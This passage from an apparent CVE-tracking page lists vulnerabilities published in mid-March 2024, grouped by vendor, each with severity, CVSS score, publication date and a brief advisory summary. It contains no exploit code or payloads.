CVE-2024-2204Medium5.52024-03-15Zemana AntiLogger v2.74.204.664 is vulnerable to a Denial of Service (DoS) vulnerability by triggering the 0x80002004 and 0x80002010 IOCTL codes of the zam64.sys and zamguard64.sys drivers.
CVE-2024-2180Medium5.52024-03-15Zemana AntiLogger v2.74.204.664 is vulnerable to a Memory Information Leak vulnerability by triggering the 0x80002020 IOCTL code of the zam64.sys and zamguard64.sys drivers

Zoom · 2 CVEs

CVESeverityCVSSKEVPublishedSummary
CVE-2024-24693High7.22024-03-13Improper access control in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.
CVE-2024-24692Medium5.32024-03-13Race condition in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.

Abocms · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25227Critical9.82024-03-15SQL Injection vulnerability in ABO.CMS version 5.8, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via the tb_login parameter in admin login page.

Advancedplugins · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28390Critical9.82024-03-14An issue in Advanced Plugins ultimateimagetool module for PrestaShop before v.2.2.01, allows a remote attacker to escalate privileges and obtain sensitive information via Improper Access Control.

Aio-libs · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27305Medium5.32024-03-12aiosmtpd is a reimplementation of the Python stdlib smtpd.py based on asyncio.

Ajexperience · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1068High7.22024-03-11The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins.

Amd · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2193Medium5.72024-03-15A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed.

Ameliabooking · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1484Medium6.12024-03-13The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the date parameters in all versions up to, and including, 1.0.98 due to insufficient input sanitization and…

Appleple · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27279Medium6.52024-03-12Directory traversal vulnerability exists in a-blog cms Ver.3.1.x series Ver.3.1.9 and earlier, Ver.3.0.x series Ver.3.0.30 and earlier, Ver.2.11.x series Ver.2.11.59 and earlier, Ver.2.10.x series Ver.2.10.51 and earlier, and Ver.2.9 and e…

Aweber · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1793High7.22024-03-13The AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth plugin for WordPress is vulnerable to SQL Injection via the 'post_id' parameter in all versions up to, and including, 7.3.14 due…

Barrykooij · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0592Medium5.42024-03-13The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1.

Basix · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25593Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms – Ultimate Form Builder allows Stored XSS.This issue affects NEX-Forms – Ultimate Form Builder: from n/a through 8.5.5.

Bitapps · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1640Medium5.32024-03-13The Contact Form Builder Plugin: Multi Step Contact Form, Payment Form, Custom Contact Form Plugin by Bit Form plugin for WordPress is vulnerable to unauthorized modification of data due to a insufficient user validation on the bitforms_up…

Blossomthemes · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2107Medium5.82024-03-12The Blossom Spa theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.3 via generated source.

Bluecoral · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0898Medium4.42024-03-13The Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to ins…

Bobbingwide · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2256Medium6.42024-03-14The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes such as bw_contact_button and bw_button shortcodes in all versions up to, and including, 4.10.0 due to insufficient input sanitization an…

Boldgrid · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0386High7.22024-03-12The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping.

Bradwenqiang · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2478Medium6.32024-03-15A vulnerability was found in BradWenqiang HR 2.0.

Brainstormforce · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1237Medium6.42024-03-13The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the flyout_layout attribute in all versions up to, and including, 1.6.24 due to insufficient input sanitization and output escaping.

Broadcom · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-43279Medium6.52024-03-12Null Pointer Dereference in mask_cidr6 component at cidr.c in Tcpreplay 4.4.4 allows attackers to crash the application via crafted tcprewrite command.

Burstbv · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1894Medium6.42024-03-13The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'burst_total_pageviews_count' custom meta field in all versions up to, and including, 1.5.6.1 due to…

Canon Inc. · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2184Critical9.82024-03-11Buffer overflow in identifier field of WSD probe request process of Small Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execu…

Castos · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6444Medium5.32024-03-11The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request.

Catchsquare · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27189Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in catchsquare WP Social Widget allows Stored XSS.This issue affects WP Social Widget: from n/a through 2.2.5.

Chatgptnextweb · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-49785Critical9.12024-03-12NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT.

Choijun · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2249Medium6.42024-03-14The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input saniti…

Chrisbadgett · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0377Medium5.32024-03-13The LifterLMS – WordPress LMS Plugin for eLearning plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_review' function in all versions up to, and including, 7.5.1.

Cimg · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-26540High7.82024-03-15A heap-based buffer overflow in Clmg before 3.3.3 can occur via a crafted file to cimg_library::CImg<unsigned char>::_load_analyze.

Citrix · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2049Medium6.52024-03-12Server-Side Request Forgery (SSRF) in Citrix SD-WAN Standard/Premium Editions on or after 11.4.0 and before 11.4.4.46 allows an attacker to disclose limited information from the appliance via Access to management IP.

Ckan · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27097Medium4.32024-03-13A user endpoint didn't perform filtering on an incoming parameter, which was added directly to the application log.

Codeium · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28120Medium6.52024-03-11codeium-chrome is an open source code completion plugin for the chrome web browser.

Codepeople · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2020High7.22024-03-13The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form page href parameter in all versions up to, and including, 5.1.56 due to insufficient input sanitization and output escaping.

Codeworkweb · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2130Medium6.42024-03-12The CWW Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Module2 widget in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping on user supplied attributes.

Collabora · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25114Low2.62024-03-11Collabora Online is a collaborative online office suite based on LibreOffice technology.

Comesio · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1380Medium5.32024-03-13The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0 (Free) and 2.25…

Concerted Action · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25921High7.12024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Concerted Action Action Network allows Reflected XSS.This issue affects Action Network: from n/a through 1.4.2.
CVESeverityCVSSKEVPublishedSummary
CVE-2024-1487Medium5.42024-03-11The Photos and Files Contest Gallery WordPress plugin before 21.3.1 does not sanitize and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks.

Conversios · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1203High8.82024-03-13The Conversios – Google Analytics 4 (GA4), Meta Pixel & more Via Google Tag Manager For WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'valueData' parameter in all versions up to, and including, 7.0.7 due to insuff…

Cool Plugins · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27953Medium4.72024-03-13Missing Authorization vulnerability in Cool Plugins Cryptocurrency Widgets – Price Ticker & Coins List.This issue affects Cryptocurrency Widgets – Price Ticker & Coins List: from n/a through 2.6.8.

Corewcf · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28252High7.52024-03-15CoreWCF is a port of the service side of Windows Communication Foundation (WCF) to .NET Core.

Cozmoslabs · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-51522Medium4.32024-03-15Cross-Site Request Forgery (CSRF) vulnerability in Cozmoslabs Paid Member Subscriptions.This issue affects Paid Member Subscriptions: from n/a through 2.10.4.

Cozyvision · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1489Medium4.32024-03-13The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.9.

Crmperks · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2030Medium6.42024-03-13The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.3 due to insufficient input sanitization an…

David De Boer · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25099Medium6.52024-03-13Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David de Boer Paytium: Mollie payment forms & donations allows Stored XSS.This issue affects Paytium: Mollie payment forms & donations: f…

Dev.institute · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0687Medium5.32024-03-13The Restrict User Access – Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API.

Devolutions · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2403Medium5.92024-03-13Improper cleanup in temporary file handling component in Devolutions Remote Desktop Manager 2024.1.12 and earlier on Windows allows an attacker that compromised a user endpoint, under specific circumstances, to access sensitive information…

Djangoproject · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27351Medium5.32024-03-15In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-servic…

Doofinder · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25596Medium5.92024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder for WooCommerce allows Stored XSS.This issue affects Doofinder for WooCommerce: from n/a through 2.1.8.

Droitthemes · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2252Medium5.42024-03-13The Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.1.5 due to insufficien…

Duitku · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0631Medium5.32024-03-13The Duitku Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_duitku_response function in all versions up to, and including, 2.11.6.

Etoile Web Design · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25597High7.12024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Etoile Web Design Ultimate Reviews allows Stored XSS.This issue affects Ultimate Reviews: from n/a through 3.2.8.

Eve-ng · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2391Low2.42024-03-12A vulnerability was found in EVE-NG 5.0.1-13 and classified as problematic.

Eyoucms · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-42286Critical9.82024-03-14There is a PHP file inclusion vulnerability in the template configuration of eyoucms v1.6.4, allowing attackers to execute code or system commands through a carefully crafted malicious payload.

Faronics · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1618High7.82024-03-12A search path or unquoted item vulnerability in Faronics Deep Freeze Server Standard, which affects versions 8.30.020.4627 and earlier.

Fedoraproject · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2400High8.82024-03-13Use after free in Performance Manager in Google Chrome prior to 122.0.6261.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Feedwordpress_project · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0839Medium5.32024-03-13The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key.

Feluelle · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28423Critical9.82024-03-14Airflow-Diagrams v2.1.0 was discovered to contain an arbitrary file upload vulnerability in the unsafe_load function at cli.py.

Flamescorpion · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1843Medium4.32024-03-13The Auto Affiliate Links plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the aalAddLink function in all versions up to, and including, 6.4.3.

Fluentforms · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6957Medium4.92024-03-13The Fluent Forms plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.9 due to insufficient input sanitization and output escaping.

Fluid-cloudnative · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-51699Medium4.02024-03-15Fluid is an open source Kubernetes-native Distributed Dataset Orchestrator and Accelerator for data-intensive applications.

Fmemodules · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28391Critical9.82024-03-14SQL injection vulnerability in FME Modules quickproducttable module for PrestaShop v.1.2.1 and before, allows a remote attacker to escalate privileges and obtain information via the readCsv(), displayAjaxProductChangeAttr, displayAjaxProdu…

Follow-redirects · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28849Medium6.52024-03-14follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects.

Formfacade · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25934Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FormFacade allows Stored XSS.This issue affects FormFacade: from n/a through 1.0.0.

Forwardflip · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1862High8.12024-03-13The WooCommerce Add to Cart Custom Redirect plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wcr_dismiss_admin_notice' function in all versions up to, and in…

Freescout · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28186High7.12024-03-12FreeScout is an open source help desk and shared inbox built with PHP.

Frenify · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0385Medium4.32024-03-13The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxAddCategory function in all versions up to, and including, 1.0.7.4.

Frentix · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28198Medium4.62024-03-11OpenOlat is an open source web-based e-learning platform for teaching, learning, assessment and communication.

Friendlyelec · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2495Medium5.22024-03-15Cryptographic key vulnerability encoded in the FriendlyWrt firmware affecting version 2022-11-16.51b3d35.

Friendsofsymfony1 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28859Medium5.02024-03-15Symfony1 is a community fork of symfony 1.4 with DIC, form enhancements, latest Swiftmailer, better performance, composer compatible and PHP 8 support.

Gacjie · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2406Medium5.42024-03-12A vulnerability, which was classified as critical, was found in Gacjie Server up to 1.0.

Geminilabs · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2293Medium6.42024-03-13The Site Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user display name in all versions up to, and including, 6.11.4 due to insufficient input sanitization and output escaping.

Geovision · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2022-46070High7.52024-03-11GV-ASManager V6.0.1.0 contains a Local File Inclusion vulnerability in GeoWebServer via Path.

Givewp · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27987High7.12024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP GiveWP give.This issue affects GiveWP: from n/a through <= 3.3.1.

Glpi-project · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27756High8.82024-03-15GLPI through 10.0.12 allows CSV injection by an attacker who is able to create an asset with a crafted title.

Go-vela · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28236High7.72024-03-12Vela is a Pipeline Automation (CI/CD) framework built on Linux container technology written in Golang.

Gonahkar · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6809Medium6.42024-03-13The Custom fields shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user suppli…

Gpriday · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1723Medium6.42024-03-13The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 1.58.7 due to insufficient input sanitization and output escaping.

Hasthemes · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1176Medium5.32024-03-13The HT Easy GA4 – Google Analytics WordPress Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the login() function in all versions up to, and including, 1.1.5.

Heimavista · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2412Medium5.32024-03-13The disabling function of the user registration page for Heimavista Rpage and Epage is not properly implemented, allowing remote attackers to complete user registration on sites where user registration is supposed to be disabled.

Hiroaki Miyashita · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25919Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hiroaki Miyashita Custom Field Template allows Stored XSS.This issue affects Custom Field Template: from n/a through 2.6.

Hitachi · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6814Medium5.62024-03-12Insertion of Sensitive Information into Log File vulnerability in Hitachi Cosminexus Component Container allows local users to gain sensitive information.This issue affects Cosminexus Component Container: from 11-30 before 11-30-05, from 1…

Hopsoft · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28181High8.12024-03-14turbo_boost-commands is a set of commands to help you build robust reactive applications with Rails & Hotwire.

Hp Inc. · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-5410High8.22024-03-12A potential security vulnerability has been reported in the system BIOS of certain HP PC products, which might allow memory tampering.

I13websolution · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2015-10130Medium5.32024-03-13The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0.

Icopydoc · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1365Medium6.12024-03-13The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the feed_id parameter in all versions up to, and including, 4.2.3 due to insufficient input sanitization and output escaping.

Imdpen · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2031Medium6.42024-03-12The Video Conferencing with Zoom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zoom_recordings_by_meeting' shortcode in all versions up to, and including, 4.4.4 due to insufficient input sanitization a…

Implem Inc. · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-21584Medium6.12024-03-12Pleasanter 1.3.49.0 and earlier contains a cross-site scripting vulnerability.

Intumit · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2413Critical9.82024-03-13Intumit SmartRobot uses a fixed encryption key for authentication.

Inunosinsi · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28187High7.22024-03-11SOY CMS is an open source CMS (content management system) that allows you to build blogs and online shops.

Jfrog · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2247High8.82024-03-13JFrog Artifactory versions below 7.77.7, 7.82.1, are vulnerable to DOM-based cross-site scripting due to improper handling of the import override mechanism.

Jmash · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27196High7.12024-03-15Cross Site Scripting (XSS) vulnerability in Joel Starnes postMash – custom post order allows Reflected XSS.This issue affects postMash – custom post order: from n/a through 1.2.0.

Joseph C Dolson · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25916Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joseph C Dolson My Calendar allows Stored XSS.This issue affects My Calendar: from n/a through 3.4.23.

Kadencewp · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1541Medium6.42024-03-13The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the htmlTag attribute in all versions up to, and including, 3.2.23 due to insufficient input sanitization…

Kbjohnson90 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6969Medium4.32024-03-13The User Shortcodes Plus plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the user_meta shortcode due to missing validation on a user controlled key.

Kirillmakarov · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2365Low1.62024-03-11A vulnerability classified as problematic was found in Musicshelf 1.0/1.1 on Android.

Kodezen · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1505High8.82024-03-13The Academy LMS – eLearning and online course solution for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.9.19.

Korenix · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2371Medium6.22024-03-12Information exposure vulnerability in Korenix JetI/O 6550 affecting firmware version F208 Build:0817.

Leantime · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27703Medium5.42024-03-13Cross Site Scripting vulnerability in Leantime 3.0.6 allows a remote attacker to execute arbitrary code via the to-do title parameter.

Linkedin · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28425High7.52024-03-14greykite v1.0.0 was discovered to contain an arbitrary file upload vulnerability in the load_obj function at /templates/pickle_utils.py.

Logitech · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2537Medium4.42024-03-15Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.

Magesh-k21 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2514High7.32024-03-15A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0.

Mainwp · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1642Medium4.32024-03-13The MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.6.0.1.

Mayurik · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2418Medium6.32024-03-13A vulnerability was found in SourceCodester Best POS Management System 1.0.

Munyweki · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25854Medium6.12024-03-11Cross Site Scripting (XSS) vulnerability in Sourcecodester Insurance Management System 1.0 allows attackers to run arbitrary code via the Subject and Description fields when submitting a support ticket.

Mz-automation · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-26529High7.52024-03-13An issue in mz-automation libiec61850 v.1.5.3 and before, allows a remote attacker to cause a denial of service (DoS) via the mmsServer_handleDeleteNamedVariableListRequest function of src/mms/iso_mms/server/mms_named_variable_list_service…

Netweblogic · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0614Medium4.42024-03-13The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping.

Newsletter2go · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1328Medium6.42024-03-12The Newsletter2Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘style’ parameter in all versions up to, and including, 4.0.14 due to insufficient input sanitization and output escaping.

Nixos · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27297Medium6.32024-03-11Nix is a package manager for Linux and other Unix systems.

Omron Corporation · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27121High7.22024-03-12Path traversal vulnerability exists in Machine Automation Controller NJ Series and Machine Automation Controller NX Series.

Palantir · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-30968Medium6.82024-03-12One of Gotham Gaia services was found to be vulnerable to a stored cross-site scripting (XSS) vulnerability that could have allowed an attacker to bypass CSP and get a persistent cross site scripting payload on the stack.

Pawaryogesh1989 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0369Medium4.32024-03-13The Bulk Edit Post Titles plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the bulkUpdatePostTitles function in all versions up to, and including, 5.0.0.

Payu India · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27193High7.12024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PayU India PayU India payu-india allows DOM-Based XSS.This issue affects PayU India: from n/a through <= 3.8.8.

Pega · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-50168High7.72024-03-14Pega Platform from 6.x to 8.8.4 is affected by an XXE issue with PDF Generation.

Phlex · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28199High7.12024-03-11phlex is an open source framework for building object-oriented views in Ruby.

Pickplugins · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-7072High7.52024-03-12The Post Grid Combo – 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.68 via the 'get_posts' REST API Endpoint.

Pinterest · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28251Medium5.62024-03-14Querybook is a Big Data Querying UI, combining collocated table metadata and a simple notebook interface.

Plv8 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1713High7.22024-03-14A user who can create objects in a database with plv8 3.2.1 installed is able to cause deferred triggers to execute as the Superuser during autovacuum.

Postalserver · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27938Medium5.32024-03-11Postal is an open source SMTP server.

Projectdiscovery · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27920High7.42024-03-15projectdiscovery/nuclei is a fast and customisable vulnerability scanner based on simple YAML based DSL.

Pterodactyl · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27102Critical9.92024-03-13Wings is the server control plane for Pterodactyl Panel.

Rafflepress · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1935High7.22024-03-13The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘parent_url’ parameter in all versions up to, and inclu…

Raspap · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2497Medium4.72024-03-15A vulnerability was found in RaspAP raspap-webgui 3.0.9 and classified as critical.

Remyandrade · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2393Medium6.32024-03-12A vulnerability was found in SourceCodester CRUD without Page Reload 1.0.

Rocklobster · 1 CVE

CVESeverityCVSSKEVPublishedSummary
